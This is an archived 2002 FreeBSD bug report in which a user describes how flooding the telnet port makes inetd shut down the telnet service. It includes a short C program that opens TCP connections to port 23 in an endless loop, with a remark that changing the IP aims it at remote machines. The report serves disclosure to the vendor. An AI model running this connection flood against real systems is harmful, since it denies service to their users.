Date: Mon, 4 Nov 2002 13:40:43 -0800 (PST) From: Michele Possamai <possamai@xs4all.nl> To: freebsd-gnats-submit@FreeBSD.org Subject: misc/44894: as a local non-root user and remote it's possible to make telnet throw up. Message-ID: <200211042140.gA4Leh6L042730@www.freebsd.org>
next in thread | raw e-mail | index | archive | help
>Number: 44894 >Category: misc >Synopsis: as a local non-root user and remote it's possible to make telnet throw up. >Confidential: no >Severity: non-critical >Priority: low >Responsible: freebsd-bugs >State: open >Quarter: >Keywords: >Date-Required: >Class: sw-bug >Submitter-Id: current-users >Arrival-Date: Mon Nov 04 13:50:01 PST 2002 >Closed-Date: >Last-Modified: >Originator: Michele Possamai >Release: FreeBSD-4.7-STABLE >Organization: >Environment: FreeBSD tnt.yi.org 4.7-STABLE FreeBSD 4.7-STABLE #0: Thu Oct 17 21:43:25 CEST 2002 root@tnt.yi.org:/usr/src/sys/compile/SCORPIO i386 FreeBSD xs1.xs4all.nl 4.5-RELEASE-p19 FreeBSD 4.5-RELEASE-p19 #2: Mon Oct 21 01:50:10 CEST 2002 cor@xs0.xs4all.nl:/usr/src/sys/compile/XS4ALL-SMP i386 FreeBSD capricorn.tnt.intern 4.7-STABLE FreeBSD 4.7-STABLE #3: Thu Oct 10 20:25:13 CEST 2002 root@capricorn.tnt.intern:/usr/obj/usr/src/sys/CAPRICORN i386 FreeBSD mdv.xs4all.nl 4.6-STABLE FreeBSD 4.6-STABLE #2: Tue Aug 6 03:03:47 CEST 2002 3ewh2ep@mdv.xs4all.nl:/usr/obj/usr/src/sys/DOMINATOR i386 and probably more >Description: While expirimenting with C and sockets I accidently ran accross a little bitty bug. I just don't really know where the bug would be.. it's either in telnetd or in inetd. But when running the program I wrote locally as a normal user I was able to dissable telnet access for a while... It does not effect running sessions but new connections just act like there's no service running on that port anymore. I don't really know what's happening.. but I first figured it out on the network.. so remote is possible as well. but local is just a lot faster. The telnetd even really terminates with teh following message: inetd[88]: telnet/tcp server failing (looping), service terminated I know it's just telnet and it's not really a big deal. But I tryed a bsdi machine and it doesn't have the problem.. so it's not supposed to happen I guess.. >How-To-Repeat: I used the following code to crash it locally. just adjust the ip address to do it remote but it don't know how much bandwidth it needs.. /* code.c */ #include <string.h> #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #define DEST_IP "127.0.0.1" #define DEST_PORT 23 main() { for (;;) { int sockfd; struct sockaddr_in dest_addr; sockfd = socket(AF_INET, SOCK_STREAM, 0); dest_addr.sin_family = AF_INET; dest_addr.sin_port = htons(DEST_PORT); dest_addr.sin_addr.s_addr = inet_addr(DEST_IP); memset(&(dest_addr.sin_zero), '\0', 8); connect(sockfd, (struct sockaddr *)&dest_addr, sizeof(struct sockaddr)); } } /* end of code */ >Fix: disable telnet.. it's better to use ssh anyway.. (don't know if other inetd processes might act the same as telnetd though..) for a real fix: I don't even know what I wrote to crash it.. so I definatly don't know how to fix it >Release-Note: >Audit-Trail: >Unformatted: To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-bugs" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?200211042140.gA4Leh6L042730>